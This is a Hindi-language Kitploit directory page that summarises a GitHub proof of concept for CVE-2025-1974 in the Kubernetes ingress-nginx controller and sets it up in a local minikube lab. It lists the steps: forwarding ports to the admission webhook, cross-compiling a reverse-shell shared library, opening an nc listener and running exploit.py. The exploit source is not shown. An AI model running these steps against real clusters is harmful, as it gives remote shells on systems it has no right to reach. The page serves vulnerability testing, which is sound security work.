Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1974 — CVE-2025-1974 PoC कोड | Kitploit
उपकरण/GitHubGitHub/zulloper/cve-2025-1974
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षा
GitHubzulloper/cve-2025-1974

CVE-2025-1974

CVE-2025-1974 PoC कोड

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-1974: Kubernetes Ingress Nginx Controller कमज़ोरी विश्लेषण और PoC वातावरण निर्माण

परीक्षण वातावरण

  • MacOS (M2)
  • Ingress NGINX Controller 1.11.3
  • Rancher Desktop (Docker)
  • Minikube (Kubernetes)

स्थानीय परीक्षण वातावरण सेटअप (M2 MacOS)

स्थानीय परीक्षण के लिए minikube स्थापित करें

minikube start --driver=docker

निम्नलिखित कमांड से ingress-nginx-controller कॉन्फ़िगर करें

kubectl apply -f ingress-nginx-controller.yml

पोर्ट फॉरवर्डिंग

जांचें कि Pods सही ढंग से काम कर रहे हैं

kubectl get pods -n ingress-nginx

kubectl describe <pod name> -n ingress-nginx

Pods के 80, 8443 (webhook) पोर्ट को स्थानीय 8888, 1337 पोर्ट पर पोर्ट फॉरवर्ड करें (पोर्ट फॉरवर्डिंग 80 और 8443 दोनों आवश्यक हैं)

kubectl port-forward -n ingress-nginx <pod name> 8888:80

kubectl port-forward -n ingress-nginx <pod name> 1337:8443

so (shard object library) तैयारी

rev_shell.c में रिवर्स शेल से जुड़े IP, पोर्ट बदलें

MacOS (arm64) वातावरण में संकलित करें, परीक्षण वातावरण के अनुसार संकलित करना आवश्यक है

aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c

# क्रॉस-कंपाइलर स्थापित करें
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu

AdmissionReview बनाएं (वैकल्पिक, पहले से बनाए गए फ़ाइल का उपयोग किया जा सकता है)

kube-review के साथ AdmissionReview प्रारूप में बदलें (json)

./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json

Exploit

रिवर्स शेल के लिए nc के साथ रिवर्स शेल कनेक्शन तैयार करें

nc -lv 4444

exploit.py में nginx, webhook के होस्ट और पोर्ट को संशोधित करने के बाद चलाएं

python3 exploit.py

img.png

टूल डाउनलोड करें